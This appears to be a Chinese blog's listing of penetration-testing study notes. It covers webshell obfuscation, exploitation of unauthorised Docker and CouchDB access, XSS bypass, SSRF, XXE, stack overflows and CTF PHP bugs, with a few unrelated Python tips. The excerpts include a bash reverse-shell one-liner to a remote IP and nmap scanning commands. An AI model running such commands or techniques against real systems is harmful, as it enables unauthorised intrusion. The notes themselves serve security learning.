速查信息单
PD_3569
这个作者很懒,什么都没留下…
展开
-
单台服务器测试流程
端口扫描(nmap,zmap,masscan)识别服务(看端口 ,nmap,经验 ,telnet 看返回信息)测试服务安全隐患 (经验 ,网上查找对应的安全漏洞 ,进行测试)识别中间件(404, http返回包, 经验)查找对应中间件安全隐患(网上查找对应的安全漏洞, 进行测试)识别脚本语言(cms伪静态网页 ,报错, 经验)原创 2016-06-21 17:40:29 · 952 阅读 · 0 评论 -
python读取excel,数字都是浮点型,日期格式是数字的解决办法
https://www.cnblogs.com/xxiong1031/p/7069006.htmlexcel文件内容: 读取excel:# coding=utf-8import xlrdimport sysreload(sys)sys.setdefaultencoding('utf-8')import tracebackcl转载 2017-11-14 20:43:00 · 9497 阅读 · 4 评论 -
某大数据_学生在宿舍的进出时间记录
#coding:utf-8import sysimport xlrdimport timeimport threadingfrom Queue import Queuefrom datetime import datetimefrom operator import itemgetterfrom xlrd import xldate_as_tupledef dealExcle(file原创 2017-11-15 12:17:46 · 692 阅读 · 0 评论 -
PHP WebShell变形技术总结
http://www.freebuf.com/articles/web/155891.html简介WebShell的变形技术与各种防护软件的检测方法一直都在相互对抗,本篇文章就对目前常见的WebShell的变形技术进行总结。目前的防护软件对能够执行命令函数和能够执行代码的函数都会格外的敏感,如eavl、assert、system、popen、shell_exec,所以像最为转载 2017-12-09 12:05:41 · 1628 阅读 · 0 评论 -
Docker Remote API未授权访问漏洞分析和利用
0x00 概述最近提交了一些关于 docker remote api 未授权访问导致代码泄露、获取服务器root权限的漏洞,造成的影响都比较严重,比如新姿势之获取果壳全站代码和多台机器root权限新姿势之控制蜻蜓fm所有服务器新姿势之获取百度机器root权限因为之前关注这一块的人并不多,这个方法可以算是一个“新的姿势”,本文对漏洞产生的原因和利用过程进行转载 2017-12-01 12:45:33 · 11180 阅读 · 1 评论 -
利用CouchDB未授权访问漏洞执行任意系统命令
0x00 前言5月16日阿里云盾攻防对抗团队从外部渠道获知CouchDB数据库存在未授权访问漏洞(在配置不正确的情况下)。经过测试,云盾团队率先发现利用该未授权访问漏洞不仅会造成数据的丢失和泄露,甚至可执行任意系统命令。云盾安全专家团队第一时间完成了漏洞上报、安全评级,并通知了所有可能受影响的用户。下面将对该漏洞的出处和技术细节做详细解释。http://static.hx99.net/转载 2017-12-01 12:50:11 · 2976 阅读 · 0 评论 -
shell反弹理解
http://www.freebuf.com/articles/system/153986.htm那么这个反弹shell命令到底是什么意思呢bash -i >&/dev/tcp/192.168.190.138/6666 0>&1 对于速食主义者,后面的内容可以选择忽略命令解释ba转载 2017-11-22 10:51:41 · 1132 阅读 · 0 评论 -
PHP的libcurl中存在的一些问题
http://wonderkun.cc/index.html/?p=670看了近来的几场ctf题目,学习了一些关于php libcurl的一些知识,在这里总结一下。0x1发送POST请求时造成任意文件读取PHP manual上对CURLOPT_POSTFIELDS 这个选项的描述如下:也就是说当CURLOPT_POSTFIELDS传入的数据是urlencode 的字转载 2017-12-22 11:18:21 · 3933 阅读 · 0 评论 -
HTTPS的APP如何抓包
https://mp.weixin.qq.com/s/0_uwha9VWgkQhQcpr80UPw 前面看到几位基友在问app是https协议的如何抓包,在这我就讲一下自己抓包的三钟方法。一、将burp的证书导入到手机中在浏览器中访问burp设置的代理地址点击CA certificate下载burpsuite的证书,保存证书文件转载 2017-12-13 23:21:33 · 3418 阅读 · 0 评论 -
XSS过滤绕过速查表
1.介绍这篇文章的主要目的是给专业安全测试人员提供一份跨站脚本漏洞检测指南。文章的初始内容是由RSnake提供给 OWASP,内容基于他的XSS备忘录:http://ha.ckers.org/xss.html。目前这个网页已经重定向到OWASP网站,将由OWASP维护和完善它。OWASP 的第一个防御备忘录项目:XSS (Cross Site Scripting)Prevention Ch转载 2017-12-16 22:51:42 · 4206 阅读 · 0 评论 -
Pwn基础知识笔记
http://www.jianshu.com/p/6e528b33e37apwntools简单语法作为最好用的pwn工具,简单记一下用法:连接:本地process()、远程remote( , );对于remote函数可以接url并且指定端口数据处理:主要是对整数进行打包:p32、p64是打包为二进制,u32、u64是解包为二进制IO模块:这个比较容易跟zio搞混,记住zio是re转载 2017-12-15 10:03:23 · 4695 阅读 · 0 评论 -
快速自检电脑是否被黑客入侵过(Linux版)
http://www.freebuf.com/articles/system/157597.html前言严谨地说, Linux只是一个内核, `GNU Linux`才算完整的操作系统, 但在本文里还是用通俗的叫法,把`Ubuntu`,`Debian`,`RedHat`,`CentOS`,`ArchLinux`等发行版都统称为`Linux`. 本文里所说的方法不仅对Linux的发转载 2017-12-25 13:49:25 · 1897 阅读 · 0 评论 -
快速自检电脑是否被黑客入侵过(Windows版)
https://www.pppan.net/blog/detail/2017-11-08-windows-self-check1. 异常的日志记录通常我们需要检查一些可疑的事件记录, 比如:“Event log service was stopped.”(事件记录服务已经停止)“Windows File Protection is not active on this转载 2017-12-25 13:50:36 · 11755 阅读 · 0 评论 -
docker环境制作
https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247486005&idx=1&sn=f58a7aee31db2a4ab71c882ed4b34996&chksm=ec1e3a1ddb69b30b966554c6db65779506f514415fc65e19f205e86597c8d9997d84d5b8666b&mpshare=1&转载 2018-01-09 12:02:53 · 582 阅读 · 0 评论 -
手把手教你栈溢出从入门到放弃(上)
https://zhuanlan.zhihu.com/p/258164260x20 背景知识在介绍如何实现溢出攻击之前,让我们先简单温习一下函数调用栈的相关知识。函数调用栈是指程序运行时内存一段连续的区域,用来保存函数运行时的状态信息,包括函数参数与局部变量等。称之为“栈”是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(callee)的状态转载 2017-11-03 16:37:37 · 2672 阅读 · 0 评论 -
渗透测试工具实战技巧合集
最好的 NMAP 扫描策略# 适用所有大小网络最好的 nmap 扫描策略# 主机发现,生成存活主机列表$ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24$ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt# 端口发现,发现大部分常用端口# htt转载 2016-06-01 09:06:21 · 2225 阅读 · 0 评论 -
浅谈PHP弱类型安全
本文转自wooyun知识库0x00 弱类型初探没有人质疑php的简单强大,它提供了很多特性供开发者使用,其中一个就是弱类型机制。在弱类型机制下 你能够执行这样的操作[AppleScript] 纯文本查看 复制代码?123456#!php?php$var = 1;$var = array();$v转载 2016-07-28 08:48:40 · 315 阅读 · 0 评论 -
渗透常用端口突破
当80找不到漏洞时候 也许用namp扫描端口会成为突破点 比如一台 务器通过端口映射了几个不同的站点 那么就可以从其他站点突破 当然一些服务 如MySQL tomcat 爆破 弱口令 经常能有惊喜 端口对应的服务如下、netstat 21 ftp 主要看是否支持匿名,也可以跑弱口令 22 ssh 弱口令爆破 23 telnet 弱口令爆破 69/udp TFTP udp端口转载 2016-08-03 09:27:14 · 726 阅读 · 0 评论 -
WEBSHELL
前言WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。本篇文章将带大家学习如何获取WebShell,如何隐藏WebShell,有攻必有防,最后带大家学习查杀WebShell。目录第一节 CMS获取WebShell第二节 非CMS获取WebShell第三节 基于xslt转换的WebShell第四节转载 2016-08-04 19:13:46 · 746 阅读 · 0 评论 -
sqlmap表找不到
以下是从SQLMAP帮助文档中看到的,希望有用。暴力破解表名参数:–common-tables当使用–tables无法获取到数据库的表时,可以使用此参数。通常是如下情况:1、MySQL数据库版本小于5.0,没有information_schema表。2、数据库是Microssoft Access,系统表MSysObjects是不可读的(默认)。3、当前用户没有权限读取系转载 2017-02-11 22:35:53 · 5531 阅读 · 0 评论 -
ereg() 截断漏洞
提示是ereg()函数有漏洞哩;从小老师就说要用科学的方法来算数。<?phpif (isset ($_GET['password'])) { if (ereg ("^[a-zA-Z0-9]+$",$_GET['password']) === FALSE) { echo '<p>You password must be alphanumeric</p>'原创 2017-03-06 20:38:04 · 9087 阅读 · 0 评论 -
sha1() md5() 漏洞
1.Prudential I don‘t think that sha1 is broken. Prove me wrong. 代码如下:<html> <head> <title>level1</title> <link rel='stylesheet' href='style.css' type='text/css'> </head> <body> <转载 2017-03-06 21:06:48 · 3659 阅读 · 0 评论 -
未知攻焉知防——XXE漏洞攻防
一、XML基础知识XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明,也可以外部引用。内部声明DTD转载 2017-03-29 09:27:13 · 884 阅读 · 0 评论 -
http方法详解
HTTP方法OPTIONS使用该方法来获取资源支持的HTTP方法列表,或者ping服务器。请求:只有header没有body。响应:默认只有header,但是也可以在body中添加内容,比如描述性文字示例:# 测试对应资源所支持的方法OPTIONS /test-options HTTP/1.1Host: localhost# 响应HTTP/1.1转载 2017-04-12 18:30:12 · 752 阅读 · 0 评论 -
SSRF漏洞分析与利用
http://www.91ri.org/17111.html前言:总结了一些常见的姿势,以PHP为例,先上一张脑图,划√的是本文接下来实际操作的0x01 漏洞产生以curl为例,漏洞代码为ssrf.phpDefault1234567转载 2017-11-06 20:55:30 · 7806 阅读 · 1 评论 -
python去掉 unicode 字符串前面的 u
有时我们会碰到类似下面这样的 unicode 字符串:u'\xe4\xbd\xa0\xe5\xa5\xbd'这明显不是一个正确的 unicode 字符串,可能是在哪个地方转码转错了。我们要想得到正确的 unicode 字符串首先就必须先将这个字符串转成非 unicode 字符串, 然后再进行解码。按照普通的办法进行 encode 肯定是不行的,因为这不是一个正确的 unicode 字符串:In [1转载 2017-10-30 12:31:46 · 18693 阅读 · 0 评论 -
python 保存为中文
这么简单的问题 我竟然 弄了半天 list1 = [u'\u96f7\u519b', u'\u9ece\u4e07\u5f3a', u'\u6d2a\u950b', u'\u5218\u5fb7', u'\u96f7\u519b', u'\u6797\u658c', u'\u5218\u82b9', u'\u8bb8\u8fbe\u6765', u'\u96f7\u519b', u'\u9ece\转载 2017-10-30 13:22:50 · 1410 阅读 · 0 评论 -
Burpsuite API 文档 python & java
https://www.cloud.tencent.com/developer/article/1166490自己想写个插件,找了一下午愣是没找到python稍微详细点的文档直接看别人的代码借鉴,又是感觉这里或者那里迷迷糊糊的跟朋友打了几把LOL,又找了一圈,发现这篇还挺良心的,记录一下,以防止后使用 0x01 BurpSuite API中常见的类IBurpExtender...转载 2018-08-04 22:54:06 · 3134 阅读 · 0 评论